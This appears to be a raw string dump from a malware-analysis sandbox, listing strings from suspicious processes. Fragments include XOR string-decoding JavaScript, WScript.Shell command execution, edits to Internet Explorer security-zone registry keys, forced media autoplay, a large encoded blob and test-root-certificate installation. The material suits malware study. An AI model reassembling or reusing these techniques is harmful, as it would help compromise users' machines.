Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Kernel32.dll
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
HTTP/1.1
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
winmm.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
?"?&?*?.?
11
3,313[3`3
6 7%7s7
56O6\6n6
4.434[4`4
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns  kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1  833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk  X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns  kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1  833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk  X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX7
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

svchost.exe_472_rwx_01000000_00006000:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

update.exe_2168:

.text
`.data
.rsrc
testroot.cer install failed 0x%lx
InstallOrRemoveTestCertificate: Failed to get FPs to MapFile
InstallOrRemoveTestCertificate: GetWindowsDirectory failed: 0x%lx
InstallOrRemoveTestCertificate: Allocation failed for CryptDataBlob.pbData
InstallOrRemoveTestCertificate: CertAddCertificateContextToStore failed: 0x%lx
InstallOrRemoveTestCertificate: CertSetCertificateContextProperty failed: 0x%lx
InstallOrRemoveTestCertificate: CertOpenStore failed: 0x%lx
InstallOrRemoveTestCertificate: CertCreateCertificateContext failed: 0x%lx
InstallOrRemoveTestCertificate: SetupDecompressOrCopyFile failed: 0x%lx
InstallOrRemoveTestCertificate: fnSetupOpenAndMapFileForRead failed: 0x%lx
d_.tmp%
InstallOrRemoveTestCertificate: LoadLibrary for SetupApi.dll failed: 0x%lx
SetupApi.DLL
1.3.6.1.4.1.311.10.3.6
1.3.6.1.4.1.311.10.3.5
1.3.6.1.5.5.7.3.3
new\testroot.ce*
testroot.ce*
